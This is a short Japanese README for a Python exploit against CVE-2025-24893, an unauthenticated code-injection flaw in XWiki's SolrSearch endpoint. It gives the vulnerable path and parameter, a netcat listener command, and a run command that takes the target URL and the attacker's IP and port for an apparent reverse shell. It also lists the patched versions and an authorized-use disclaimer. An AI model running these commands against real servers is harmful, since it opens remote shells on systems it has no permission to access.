
XWikiにおけるリモートコード実行(RCE)エクスプロイト
XWiki上でのリモートコード実行(RCE)エクスプロイト
CVE-2025-24893に対するPython3エクスプロイト。XWikiプラットフォームに影響する、認証不要のリモートコード実行(RCE)の重大な脆弱性です。
このスクリプトは、SolrSearchマクロコンポーネント内のコード/式インジェクション(CWE-95)の欠陥を悪用します。この欠陥により、攻撃者は基盤となるオペレーティングシステム上で任意のGroovy/Javaコードを実行できます。エクスプロイトは、JavaのRuntime.getRuntime().exec()関数のコマンド解釈の制限を回避するために、自動的にBase64エンコーディングを実行します。
/bin/get/Main/SolrSearch (textパラメータ経由)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
例:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsライブラリ必要な依存関係をインストールするには:
pip install requests
XWikiインスタンスを修正済みの公式バージョン(15.10.11、16.4.1、16.5.0-rc-1 またはそれ以降)にアップデートしてください。
このスクリプトは、教育目的、許可されたセキュリティ監査、および侵入テスト(ペネトレーションテスト)のためにのみ開発されています。作者は、このツールによって引き起こされた不正使用、損害、または違法行為について一切の責任を負いません。事前の許可なしに本スクリプトをターゲットに対して使用することは、固く禁じられています。